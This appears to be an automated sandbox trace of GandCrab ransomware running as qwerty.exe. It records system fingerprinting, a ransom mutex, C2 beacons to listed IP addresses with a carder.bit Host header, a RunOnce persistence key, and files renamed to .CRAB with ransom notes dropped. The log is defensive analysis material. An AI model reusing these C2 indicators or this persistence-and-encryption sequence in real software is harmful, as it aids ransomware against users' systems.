Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
System Sleep duration = 50 milliseconds (0.050 seconds) True 2
Window Create class_name = MyMainWnd, wndproc_parameter = 0 True 1
Window Set Attribute class_name = MyMainWnd, index = 18446744073709551600, new_long = 1421869056 True 1
System Sleep duration = 100 milliseconds (0.100 seconds) True 1
Thread 0xa54
2 0
Category Operation Information Success Count Logfile
Window Create class_name = MyMainWnd, wndproc_parameter = 0 True 1
System Sleep duration = 50 milliseconds (0.050 seconds) True 1
Thread 0xa58
90 35
»
Category Operation Information Success Count Logfile
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7718ffc1 True 1
Fn
Mutex Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=8a13d26b705ba84c True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7718ffc1 True 1
Fn
System Get Time type = Ticks, time = 100183 True 1
Fn
System Get Computer Name result_out = YKYD69Q True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Control Panel\International True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Control Panel\International, value_name = LocaleName, data = 101 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 1, data = 48 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 2, data = 48 False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = productName, data = 87 True 1
System Get Info type = Hardware Information True 1
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7718ffc1 True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Close Session - True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Inet Read Response size = 10238, size_out = 14 True 1
Inet Read Response size = 10238, size_out = 0 True 1
Inet Close Session - True 1
Inet Close Session - True 1
Inet Close Session - True 1
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 256 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, type = size True 1
File Read filename = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 238601, size_out = 238601 True 1
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7718ffc1 True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0xb04, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
File Read size = 4096, size_out = 309 True 1
Inet Close Session - True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = 176.223.114.212, server_port = 80 True 1
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = ayphore, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 176.223.114.212/ayphore True 1
Inet Read Response size = 204798, size_out = 552 True 1
Inet Read Response size = 204798, size_out = 0 True 1
Inet Close Session - True 1
Inet Close Session - True 1
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7718ffc1 True 1
Inet Close Session - True 1
System Get Time type = Ticks, time = 116782 True 1
System Sleep duration = -1 (infinite) True 1
System Get Time type = Ticks, time = 145205 True 2
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7718ffc1 True 1
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7718ffc1 True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0xbc4, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
File Read filename = C:\\CRAB-DECRYPT.txt, size = 4096, size_out = 308 True 1
Inet Close Session - True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = 93.103.166.70, server_port = 80 True 1
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = stowsc?orestei=ea, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 93.103.166.70/stowsc?orestei=ea True 1
Inet Read Response size = 204798, size_out = 0 True 1
Inet Close Session - True 1
Inet Close Session - True 1
Inet Close Session - True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x750ddf04 True 1
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Process Create process_name = C:\Windows\system32\wbem\wmic.exe, show_window = SW_HIDE True 1
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 256 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x750ddf04 True 1
System Get Time type = Ticks, time = 151367 True 1
System Get Time type = Ticks, time = 152366 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp, size = 14 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp, size = 40 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp, size = 5184000 True 1
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 256 True 1
Process Create process_name = cmd.exe, show_window = SW_HIDE True 1
Process Create process_name = https://www.torproject.org/download/download-easy.html.en, show_window = SW_SHOW False 1
Thread 0xa60
524 0
Category Operation Information Success Count Logfile
Driver Enumerate load_addresses = 1638160 True 1
Driver Enumerate load_addresses = 2162688 True 1
Driver Enumerate load_addresses = 1638160 True 1
Driver Enumerate load_addresses = 2162688 True 1
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 256 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Environment Get Environment String name = AppData, result_out = C:\Users\aETAdzjz\AppData\Roaming True 1
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, type = size True 1
Driver Enumerate load_addresses = 1638000 True 1
Driver Enumerate load_addresses = 3014656 True 1
Driver Enumerate load_addresses = 1638012 True 1
Driver Enumerate load_addresses = 3014656 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 238601 True 1
Fn
Data
Module Unmap process_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x750ddf04 True 1
Fn
Registry Create Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce True 1
Fn
Registry Write Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, value_name = otgsjjqnaut, data = "C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe", size = 112, type = REG_SZ True 1
Fn
Thread 0xb24
7811 0
Category Operation Information Success Count Logfile
File Create filename = C:\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\S-1-5-21-2345716840-1148442690-1481144037-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\S-1-5-21-2345716840-1148442690-1481144037-1000\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Get Info filename = C:\bootmgr, type = file_attributes True 1
Fn
File Move source_filename = C:\bootmgr, destination_filename = C:\bootmgr.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\bootmgr.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Move source_filename = C:\bootmgr.CRAB, destination_filename = C:\bootmgr True 1
Fn
File Create filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\PerfLogs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\PerfLogs\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\PerfLogs\Admin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\PerfLogs\Admin\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files (x86)\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files (x86)\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Recovery\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Recovery\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
